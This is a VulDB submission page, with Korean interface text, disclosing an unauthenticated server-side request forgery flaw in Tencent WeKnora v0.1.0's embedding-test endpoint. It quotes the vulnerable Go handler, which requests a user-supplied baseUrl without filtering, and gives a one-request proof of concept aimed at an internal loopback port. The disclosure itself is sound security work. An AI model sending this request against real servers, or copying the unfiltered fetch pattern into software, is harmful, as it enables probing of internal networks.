제출 #658926: Tencent WeKnora v0.1.0 Server-Side Request Forgery정보

제목	Tencent WeKnora v0.1.0 Server-Side Request Forgery
설명	# Summary Tencent WeKnora v0.1.0 contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the `/api/v1/initialization/embedding/test` endpoint. Attackers can exploit this to probe internal network services by manipulating the `baseUrl` parameter when source is set to `"remote"`. # Details The `/api/v1/initialization/embedding/test` endpoint lacks authentication and proper input validation. When the source parameter is set to `"remote"`, the `baseUrl` parameter is used to make arbitrary HTTP requests without restrictions, including requests to internal IPs and ports. ``` export function testEmbeddingModel(modelConfig: { source: 'local' \| 'remote'; modelName: string; baseUrl?: string; apiKey?: string; dimension?: number; }): Promise<{ available: boolean; message?: string; dimension?: number }> { return new Promise((resolve, reject) => { post('/api/v1/initialization/embedding/test', modelConfig) // 直接调用后端接口 .then((response: any) => resolve(response.data \|\| {})) .catch((error: any) => reject(error)); }); } ``` ``` func (h InitializationHandler) TestEmbeddingModel(c gin.Context) { var req struct { Source string `json:"source" binding:"required"` ModelName string `json:"modelName" binding:"required"` BaseURL string `json:"baseUrl"` APIKey string `json:"apiKey"` } if err := c.ShouldBindJSON(&req); err != nil { c.Error(errors.NewBadRequestError(err.Error())) return } if req.Source == "remote" { client := &http.Client{Timeout: 15 * time.Second} resp, err := client.Get(req.BaseURL + "/embeddings") if err != nil { c.JSON(200, gin.H{"available": false}) return } defer resp.Body.Close() c.JSON(200, gin.H{ "available": resp.StatusCode == 200, "dimension": 1024, // 示例值 }) return } } ``` No filtering is applied to prevent access to internal network resources. # Proof of Concept (PoC) ``` POST /api/v1/initialization/embedding/test HTTP/1.1 Host: 192.168.0.22 Content-Type: application/json { "source": "remote", "modelName": "test", "baseUrl": "http://127.0.0.1:520" } ```
원천	⚠️ https://github.com/Hebing123/cve/issues/90
사용자	jiashenghe (UID 39445)
제출	2025. 09. 19. AM 11:40 (7 개월 ago)
모더레이션	2025. 09. 26. AM 11:31 (7 days later)
상태	수락
VulDB 항목	326083 [Tencent WeKnora 0.1.0 test testEmbeddingModel baseUrl 권한 상승]
포인트들	20

◂ 이전 개요 다음 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!